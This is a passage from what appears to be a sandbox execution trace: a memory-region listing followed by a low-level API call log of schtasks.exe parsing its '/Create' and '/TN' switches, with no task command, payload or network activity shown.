name = "private_0x0000000000400000"
filename = ""
Region:
id = 698
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 699
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 700
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 701
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 780
start_va = 0x550000
end_va = 0x60dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 781
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 782
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 783
start_va = 0x110000
end_va = 0x14ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 784
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 785
start_va = 0x190000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 786
start_va = 0x76680000
end_va = 0x76711fff
monitored = 0
entry_point = 0x766b8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 787
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 788
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 789
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 790
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 791
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 792
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 793
start_va = 0x610000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 794
start_va = 0x610000
end_va = 0x6f9fff
monitored = 0
entry_point = 0x64d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 795
start_va = 0x780000
end_va = 0x78ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 796
start_va = 0x150000
end_va = 0x162fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\schtasks.exe.mui")
Region:
id = 797
start_va = 0x790000
end_va = 0xac6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 798
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 799
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 800
start_va = 0x74340000
end_va = 0x743c3fff
monitored = 0
entry_point = 0x74366220
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 801
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 802
start_va = 0x6ba90000
end_va = 0x6bb1bfff
monitored = 0
entry_point = 0x6baca6c0
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll")
Thread:
id = 12
os_tid = 0x660
[0223.119] GetModuleHandleA (lpModuleName=0x0) returned 0xb60000
[0223.119] __set_app_type (_Type=0x1)
[0223.119] __p__fmode () returned 0x76b44d6c
[0223.120] __p__commode () returned 0x76b45b1c
[0223.120] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb80840) returned 0x0
[0223.120] __wgetmainargs (in: _Argc=0xb8ade0, _Argv=0xb8ade4, _Env=0xb8ade8, _DoWildCard=0, _StartInfo=0xb8adf4 | out: _Argc=0xb8ade0, _Argv=0xb8ade4, _Env=0xb8ade8) returned 0
[0223.121] _onexit (_Func=0xb82bc0) returned 0xb82bc0
[0223.121] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0223.121] WinSqmIsOptedIn () returned 0x0
[0223.121] GetProcessHeap () returned 0x450000
[0223.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457468
[0223.122] RtlRestoreLastWin32Error () returned 0x0
[0223.122] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0223.122] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0223.122] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0223.122] RtlVerifyVersionInfo (VersionInfo=0xdf9f8, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0223.122] GetProcessHeap () returned 0x450000
[0223.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x4573c0
[0223.122] lstrlenW (lpString="") returned 0
[0223.122] GetProcessHeap () returned 0x450000
[0223.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x2) returned 0x450598
[0223.122] GetProcessHeap () returned 0x450000
[0223.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456e48
[0223.122] GetProcessHeap () returned 0x450000
[0223.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457378
[0223.122] GetProcessHeap () returned 0x450000
[0223.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456c10
[0223.122] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456c30
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456c50
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456840
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x4573d8
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456860
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456880
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4565d8
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4565f8
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457438
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x456618
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x452780
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4527a0
[0223.123] GetProcessHeap () returned 0x450000
[0223.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4527c0
[0223.123] SetThreadUILanguage (LangId=0x0) returned 0x409
[0223.128] RtlRestoreLastWin32Error () returned 0x0
[0223.128] GetProcessHeap () returned 0x450000
[0223.128] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459588
[0223.128] GetProcessHeap () returned 0x450000
[0223.128] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459508
[0223.128] GetProcessHeap () returned 0x450000
[0223.128] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459388
[0223.128] GetProcessHeap () returned 0x450000
[0223.128] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4596e8
[0223.128] GetProcessHeap () returned 0x450000
[0223.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459448
[0223.129] GetProcessHeap () returned 0x450000
[0223.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457360
[0223.129] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.129] GetProcessHeap () returned 0x450000
[0223.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x208) returned 0x458ce0
[0223.129] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x458ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0223.129] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdfb04 | out: lpdwHandle=0xdfb04) returned 0x76c
[0223.149] GetProcessHeap () returned 0x450000
[0223.149] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x776) returned 0x459db8
[0223.150] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x459db8 | out: lpData=0x459db8) returned 1
[0223.150] VerQueryValueW (in: pBlock=0x459db8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x45a168, puLen=0xdfb10) returned 1
[0223.153] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.153] _vsnwprintf (in: _Buffer=0x458ce0, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0223.153] VerQueryValueW (in: pBlock=0x459db8, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x459f98, puLen=0xdfb18) returned 1
[0223.154] lstrlenW (lpString="schtasks.exe") returned 12
[0223.154] lstrlenW (lpString="schtasks.exe") returned 12
[0223.154] lstrlenW (lpString=".EXE") returned 4
[0223.154] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0223.154] lstrlenW (lpString="schtasks.exe") returned 12
[0223.154] lstrlenW (lpString=".EXE") returned 4
[0223.155] _memicmp (_Buf1=0x457360, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.155] lstrlenW (lpString="schtasks") returned 8
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459328
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459428
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4595a8
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4593c8
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457390
[0223.155] _memicmp (_Buf1=0x457390, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0xa0) returned 0x458ef0
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459628
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4594c8
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x459608
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x457330
[0223.155] _memicmp (_Buf1=0x457330, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.155] GetProcessHeap () returned 0x450000
[0223.155] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x200) returned 0x45a798
[0223.155] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x45a798, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0223.156] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0223.156] GetProcessHeap () returned 0x450000
[0223.156] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x30) returned 0x452588
[0223.156] _vsnwprintf (in: _Buffer=0x458ef0, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0223.156] GetProcessHeap () returned 0x450000
[0223.156] GetProcessHeap () returned 0x450000
[0223.156] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459db8) returned 1
[0223.156] GetProcessHeap () returned 0x450000
[0223.156] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x459db8) returned 0x776
[0223.156] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x459db8) returned 1
[0223.157] RtlRestoreLastWin32Error () returned 0x0
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="?") returned 1
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="create") returned 6
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="delete") returned 6
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="query") returned 5
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="change") returned 6
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="run") returned 3
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="end") returned 3
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] lstrlenW (lpString="showsid") returned 7
[0223.157] GetThreadLocale () returned 0x409
[0223.157] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0223.157] RtlRestoreLastWin32Error () returned 0x0
[0223.157] RtlRestoreLastWin32Error () returned 0x0
[0223.157] lstrlenW (lpString="/Create") returned 7
[0223.158] lstrlenW (lpString="-/") returned 2
[0223.158] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.158] lstrlenW (lpString="?") returned 1
[0223.158] lstrlenW (lpString="?") returned 1
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x4574c8
[0223.158] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0xa) returned 0x457450
[0223.158] lstrlenW (lpString="Create") returned 6
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x10) returned 0x4574e0
[0223.158] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] RtlAllocateHeap (HeapHandle=0x450000, Flags=0xc, Size=0x14) returned 0x4595c8
[0223.158] _vsnwprintf (in: _Buffer=0x457450, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0223.158] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0223.158] lstrlenW (lpString="|?|") returned 3
[0223.158] lstrlenW (lpString="|Create|") returned 8
[0223.158] RtlRestoreLastWin32Error () returned 0x490
[0223.158] lstrlenW (lpString="create") returned 6
[0223.158] lstrlenW (lpString="create") returned 6
[0223.158] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x457450) returned 1
[0223.158] GetProcessHeap () returned 0x450000
[0223.158] RtlReAllocateHeap (Heap=0x450000, Flags=0xc, Ptr=0x457450, Size=0x14) returned 0x459648
[0223.158] lstrlenW (lpString="Create") returned 6
[0223.158] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.158] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0223.158] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0223.158] lstrlenW (lpString="|create|") returned 8
[0223.158] lstrlenW (lpString="|Create|") returned 8
[0223.159] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0223.159] RtlRestoreLastWin32Error () returned 0x0
[0223.159] RtlRestoreLastWin32Error () returned 0x0
[0223.159] RtlRestoreLastWin32Error () returned 0x0
[0223.159] lstrlenW (lpString="/TN") returned 3
[0223.159] lstrlenW (lpString="-/") returned 2
[0223.159] StrChrIW (lpStart="-/", wMatch=0x78002f) returned="/"
[0223.159] lstrlenW (lpString="?") returned 1
[0223.159] lstrlenW (lpString="?") returned 1
[0223.159] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.159] lstrlenW (lpString="TN") returned 2
[0223.159] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.159] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0223.159] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.159] lstrlenW (lpString="|?|") returned 3
[0223.159] lstrlenW (lpString="|TN|") returned 4
[0223.159] RtlRestoreLastWin32Error () returned 0x490
[0223.159] lstrlenW (lpString="create") returned 6
[0223.159] lstrlenW (lpString="create") returned 6
[0223.159] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.159] lstrlenW (lpString="TN") returned 2
[0223.159] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.159] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0223.159] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.159] lstrlenW (lpString="|create|") returned 8
[0223.159] lstrlenW (lpString="|TN|") returned 4
[0223.159] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0223.159] RtlRestoreLastWin32Error () returned 0x490
[0223.159] lstrlenW (lpString="delete") returned 6
[0223.159] lstrlenW (lpString="delete") returned 6
[0223.159] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] lstrlenW (lpString="TN") returned 2
[0223.160] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0223.160] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.160] lstrlenW (lpString="|delete|") returned 8
[0223.160] lstrlenW (lpString="|TN|") returned 4
[0223.160] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0223.160] RtlRestoreLastWin32Error () returned 0x490
[0223.160] lstrlenW (lpString="query") returned 5
[0223.160] lstrlenW (lpString="query") returned 5
[0223.160] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] lstrlenW (lpString="TN") returned 2
[0223.160] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0223.160] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.160] lstrlenW (lpString="|query|") returned 7
[0223.160] lstrlenW (lpString="|TN|") returned 4
[0223.160] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0223.160] RtlRestoreLastWin32Error () returned 0x490
[0223.160] lstrlenW (lpString="change") returned 6
[0223.160] lstrlenW (lpString="change") returned 6
[0223.160] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] lstrlenW (lpString="TN") returned 2
[0223.160] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.160] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0223.160] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.160] lstrlenW (lpString="|change|") returned 8
[0223.160] lstrlenW (lpString="|TN|") returned 4
[0223.160] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0223.160] RtlRestoreLastWin32Error () returned 0x490
[0223.161] lstrlenW (lpString="run") returned 3
[0223.161] lstrlenW (lpString="run") returned 3
[0223.161] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.161] lstrlenW (lpString="TN") returned 2
[0223.161] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.161] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0223.161] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.161] lstrlenW (lpString="|run|") returned 5
[0223.161] lstrlenW (lpString="|TN|") returned 4
[0223.161] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0223.161] RtlRestoreLastWin32Error () returned 0x490
[0223.161] lstrlenW (lpString="end") returned 3
[0223.161] lstrlenW (lpString="end") returned 3
[0223.161] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.161] lstrlenW (lpString="TN") returned 2
[0223.161] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.161] _vsnwprintf (in: _Buffer=0x459648, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0223.161] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.161] lstrlenW (lpString="|end|") returned 5
[0223.161] lstrlenW (lpString="|TN|") returned 4
[0223.161] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0223.161] RtlRestoreLastWin32Error () returned 0x490
[0223.161] lstrlenW (lpString="showsid") returned 7
[0223.161] lstrlenW (lpString="showsid") returned 7
[0223.161] _memicmp (_Buf1=0x4574c8, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.161] GetProcessHeap () returned 0x450000
[0223.161] HeapValidate (hHeap=0x450000, dwFlags=0x0, lpMem=0x459648) returned 1
[0223.161] GetProcessHeap () returned 0x450000
[0223.161] RtlReAllocateHeap (Heap=0x450000, Flags=0xc, Ptr=0x459648, Size=0x16) returned 0x4595e8
[0223.161] lstrlenW (lpString="TN") returned 2
[0223.161] _memicmp (_Buf1=0x4574e0, _Buf2=0xb62708, _Size=0x7) returned 0
[0223.162] _vsnwprintf (in: _Buffer=0x4595e8, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0223.162] _vsnwprintf (in: _Buffer=0x4595c8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0223.162] lstrlenW (lpString="|showsid|") returned 9
[0223.162] lstrlenW (lpString="|TN|") returned 4
[0223.162] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0223.162] RtlRestoreLastWin32Error () returned 0x490
